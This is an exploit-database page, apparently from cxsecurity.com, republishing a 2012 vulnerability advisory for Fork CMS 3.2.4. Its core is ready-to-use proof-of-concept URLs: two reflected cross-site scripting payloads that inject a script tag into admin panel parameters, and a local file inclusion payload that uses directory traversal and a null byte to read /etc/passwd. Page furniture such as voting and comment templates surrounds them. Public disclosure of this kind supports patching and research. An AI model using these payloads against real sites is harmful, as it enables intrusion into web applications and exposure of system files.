Fork CMS 3.2.4 Cross Site Scripting / Local File Inclusion

2012-02-13 / 2012-08-15
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79
CWE-98

########################################################################################################################## # Exploit Title: Fork CMS v.3.2.4 - Multiple Vulnerabilities # Script Page : http://www.fork-cms.com # Date: 11-02-2012 # Author : RandomStorm - http://www.randomstorm.com # Avram Marius Gabriel (d3v1l) # Tested on: Windows XP & Vista ########################################################################################################################## # Reflected Cross-Site Scripting (XSS) on Admin Panel # POC: # http://site.com/blog/settings?token=true&report=</script><script>alert(1)</script> # http://site.com/users/index?token=true&error=</script><script>alert(1)</script> ########################################################################################################################### # Local File Inclusion ( LFI ) # POC: # http://site.com/frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en ########################################################################################################################## # About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website. ###########################################################################################################################

References:

http://www.fork-cms.com
http://www.randomstorm.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top